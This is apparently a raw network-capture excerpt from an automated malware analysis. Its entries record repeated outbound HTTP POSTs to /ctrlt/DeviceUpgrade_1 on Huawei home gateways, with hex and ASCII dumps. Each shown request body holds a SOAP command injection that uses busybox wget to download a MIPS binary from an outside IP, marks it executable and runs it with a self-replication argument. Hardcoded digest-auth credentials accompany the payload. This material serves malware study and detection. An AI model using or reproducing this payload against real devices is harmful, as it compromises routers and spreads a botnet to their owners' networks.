                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1126192.168.2.2352932157.100.24.23237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528902054 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1127192.168.2.2357798157.58.254.11437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528960943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1128192.168.2.2334560115.83.23.16737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528960943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1129192.168.2.235777850.55.249.22737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528966904 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1130192.168.2.233787454.91.34.25537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528980970 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1131192.168.2.2334406190.189.239.5437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529062033 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1132192.168.2.233881641.113.211.11137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529063940 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1133192.168.2.2337792197.166.115.25037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529100895 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1134192.168.2.2341468157.140.201.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529100895 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1135192.168.2.233292441.22.213.12637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529114962 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
